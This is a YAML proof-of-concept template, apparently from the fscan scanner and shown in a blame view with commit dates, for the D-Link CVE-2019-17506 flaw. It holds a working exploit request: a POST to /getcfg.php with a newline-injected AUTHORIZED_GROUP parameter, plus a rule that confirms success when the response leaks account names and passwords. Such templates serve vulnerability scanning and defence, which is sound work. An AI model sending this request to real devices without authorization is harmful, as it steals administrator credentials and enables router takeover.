fscan/WebScan/pocs/dlink-cve-2019-17506.yml

name: poc-yaml-dlink-cve-2019-17506
rules:
  - method: POST
    path: /getcfg.php
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
    follow_redirects: false
    expression: >
      response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"<name>") && response.body.bcontains(b"<password>")
detail:
  author: l1nk3r,Huasir(https://github.com/dahua966/)
  links:
    - https://xz.aliyun.com/t/6453
commit message 2020-12-29 01:17:10 -08:00			`name: poc-yaml-dlink-cve-2019-17506`
			`rules:`
			`- method: POST`
			`path: /getcfg.php`
			`headers:`
			`Content-Type: application/x-www-form-urlencoded`
			`body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a`
			`follow_redirects: false`
			`expression: >`
优化xray解析模块,支持groups、新增poc 2021-11-15 19:53:46 -08:00			`response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"<name>") && response.body.bcontains(b"<password>")`
commit message 2020-12-29 01:17:10 -08:00			`detail:`
			`author: l1nk3r,Huasir(https://github.com/dahua966/)`
			`links:`
			`- https://xz.aliyun.com/t/6453`